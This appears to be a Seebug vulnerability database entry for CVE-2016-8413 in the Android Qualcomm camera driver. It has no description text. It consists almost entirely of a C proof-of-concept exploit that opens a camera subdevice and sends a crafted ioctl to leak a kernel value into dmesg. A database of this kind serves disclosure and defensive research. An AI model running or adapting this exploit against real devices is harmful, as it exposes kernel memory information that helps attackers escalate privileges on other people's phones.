Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities(CVE-2016-8413)

2017-04-04T00:00:00
ID SSV:92872
Type seebug
Reporter Root
Modified 2017-04-04T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/videodev2.h>
#include <linux/types.h>

struct msm_camera_v4l2_ioctl_t {
	uint32_t id;
	size_t len;
	int32_t trans_code;
	void __user *ioctl_ptr;
};

#define VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO \
	_IOWR('V', BASE_VIDIOC_PRIVATE + 7, struct msm_camera_v4l2_ioctl_t)

int main(void)
{
	int fd;
	int ret;
	struct msm_camera_v4l2_ioctl_t request = { 0 };
	
	uint32_t identity = 0xAAAAAAAA;
	
	request.len = 1;
	request.ioctl_ptr = &identity;

	fd = open("/dev/v4l-subdev12", O_RDWR);

	if (fd < 0) {
		printf("Couldn't open msm_cpp, reason: %s\n", strerror(errno));
		exit(-1);
	}

	ret = ioctl(fd, VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO, &request);
	
	close(fd);

	printf("Success! Check dmesg for 'identity' value...\n");

	// system("dmesg | grep -i \"error finding buffer queue entry for identity:\"");
}